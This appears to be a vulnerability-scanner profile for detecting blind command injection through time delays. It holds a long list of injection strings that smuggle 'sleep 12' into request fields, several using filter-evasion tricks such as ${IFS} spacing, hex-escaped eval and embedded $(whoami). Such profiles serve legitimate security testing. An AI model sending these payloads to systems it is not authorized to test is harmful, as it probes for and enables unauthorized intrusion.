[
  {
    "ProfileName": "BlindRCE - sleep",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,|| sleep 12",
      "true,| sleep 12",
      "true,; sleep 12",
      "true,\u0026\u0026 sleep 12",
      "true,\u0026 sleep 12",
      "true,; (sleep 12 \u0026)",
      "true,; (sleep 12)",
      "true,; { sleep 12; }",
      "true,; sleep 12   ",
      "true,; sleep 12 \u0026 #",
      "true,; sleep 12 \u0026\u003e /dev/null #",
      "true,; sleep 12 # ",
      "true,; sleep 12 \u003e /dev/null  ",
      "true,; sleep 12 \u003e /dev/null #",
      "true,;(sleep 12${IFS})  ",
      "true,;sleep 12${IFS}  ",
      "true,;sleep 12${IFS}#  ",
      "true,;sleep 12${IFS}\u003e/dev/null  ",
      "true,;sleep 12${IFS}\u0026\u003e/dev/null#  ",
      "true,\u0027; $(sleep 12) #",
      "true,\u0027; sleep 12 \u0026 # ",
      "true,\u0027; sleep 12 #   ",
      "true,\u0027; sleep 12 \u003e /dev/null #",
      "true,\u0027; sleep 12; echo \u0027",
      "true,\u0027;sleep 12${IFS}#  ",
      "true,\u0027;sleep 12${IFS};echo\u0027  ",
      "true,\"; (sleep 12) #",
      "true,\"; $(sleep 12) #",
      "true,\"; sleep 12 \u0026 # ",
      "true,\"; sleep 12 #",
      "true,\"; sleep 12; echo \"",
      "true,\";sleep 12${IFS}#  ",
      "true,\";sleep 12${IFS};echo\"  ",
      "true,\";sleep 12${IFS}\u0026 #  ",
      "true,\u0026 sleep 12   ",
      "true,\u0026 sleep 12 #",
      "true,\u0026\u0026 (sleep 12)  ",
      "true,\u0026\u0026 $(sleep 12) #",
      "true,\u0026\u0026 sleep 12  ",
      "true,\u0026\u0026 sleep 12 #",
      "true,\u0026\u0026 sleep 12 \u003e /dev/null ",
      "true,\u0026\u0026$(sleep 12${IFS}\u003e/dev/null)  ",
      "true,\u0026\u0026sleep 12${IFS}  ",
      "true,\u0026\u0026sleep 12${IFS}#  ",
      "true,\u0026sleep 12${IFS}  ",
      "true,`sleep 12 \u0026`",
      "true,`sleep 12 \u0026\u003e /dev/null`",
      "true,`sleep 12`",
      "true,`sleep 12${IFS}`  ",
      "true,| `sleep 12` #",
      "true,| sleep 12   ",
      "true,| sleep 12 # ",
      "true,|| sleep 12  ",
      "true,|| sleep 12 #",
      "true,|| sleep 12 2\u003e /dev/null",
      "true,||sleep 12${IFS}  ",
      "true,|sleep 12${IFS}  ",
      "true,|sleep 12${IFS}#  ",
      "true,$(sleep 12 \u0026)",
      "true,$(sleep 12; echo \"\")",
      "true,$(sleep 12)",
      "true,$(sleep 12${IFS})  ",
      "true,$(sleep 12${IFS}\u0026)",
      "true,; a\u003dsleep; b\u003d12; $a${IFS}$b",
      "true,; eval \"sleep${IFS}12\"",
      "true,; function f() { sleep 12; }; f",
      "true,; cmd\u003d(sleep 12); \"${cmd[@]}\"",
      "true,; time sleep 12",
      "true,; setsid sleep 12",
      "true,; alias n\u003dsleep; n 12",
      "true,; eval $\u0027\\x73\\x6c\\x65\\x65\\x70\u0027${IFS}\u002712\u0027",
      "true,`; printf \"sleep 12\\n\"",
      "true,; { sleep 12; }",
      "true,;;`sleep 12${IFS}$(whoami)`;;",
      "true,;$(sleep 12${IFS}$(whoami)) \u0026\u0026",
      "true,;$(`sleep 12${IFS}`) ||",
      "true,;;$(sleep 12${IFS}$(hostname));;",
      "true,;$(X\u003d$\u0027sleep 12${IFS}\u0027 \u0026\u0026 $X) \u0026",
      "true,;$(eval${IFS}$\u0027\\x73\\x6c\\x65\\x65\\x70${IFS}12\u0027) ;;",
      "true,;;`sleep 12${IFS} \u003e /dev/null`;;",
      "true,;$(sleep 12${IFS}$(whoami) \u0026)",
      "true,;`$(sleep 12${IFS}$(hostname))` \u0026\u0026",
      "true,;$(sleep 12${IFS}; echo) ||",
      "true,;$(sleep 12${IFS}$(whoami) #) ;;",
      "true,;;$(sleep 12${IFS} \u0026\u003e/dev/null);;",
      "true,;`sleep 12${IFS}$(whoami)` \u0026",
      "true,;$(sleep 12${IFS}$(whoami)${IFS}--) \u0026\u0026",
      "true,;$(`sleep 12${IFS}$(hostname)`) ||",
      "true,||;$(`sleep 12${IFS}$(hostname)`) ||",
      "true,;;$(sleep 12${IFS}) | $(sleep 12${IFS});;",
      "true,;$(sleep 12${IFS}$(whoami) || sleep 12${IFS}) \u0026",
      "true,;$(`sleep 12${IFS} \u0026\u0026 sleep 12${IFS}$(whoami)`) ;;",
      "true,;;`$(sleep 12${IFS}$(whoami))`;;",
      "true,;$(sleep 12${IFS}$(hostname) \u0026\u003e/dev/null) \u0026\u0026",
      "true,|| sleep 12 ||",
      "true,||sleep 12||",
      "true,\u0026\u0026sleep 12\u0026\u0026",
      "true,\u0026 sleep 12 \u0026",
      "true,| sleep 12 |",
      "true,; sleep 12 ;",
      "true,\u0026\u0026 sleep 12 \u0026\u0026",
      "true,X\u003dsleep; Y\u003d12; $X${IFS}$Y",
      "true,eval \"sleep${IFS}12\"",
      "true,a\u003dsleep; b\u003d12; $a${IFS}$b",
      "true,cmd\u003d(sleep 12); \"${cmd[@]}\"",
      "true,\u0027sleep 12\u0027",
      "true,\"sleep 12\"",
      "true,\u0027$(sleep 12)\u0027",
      "true,\"$(sleep 12)\"",
      "true,\u0027`sleep 12`\u0027",
      "true,\"`sleep 12`\"",
      "true,; (sleep 12)",
      "true,$(sleep 12)",
      "true,`sleep 12`",
      "true,`echo $(sleep 12)`",
      "true,$(echo sleep 12)"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "|;\u0026",
    "Grep": [],
    "Tags": [
      "Collaborator",
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "10",
    "TimeOut2": "20",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindRCE - Sleep",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "RCE with el payloads: \u003cbr\u003e  \u003cpayload\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]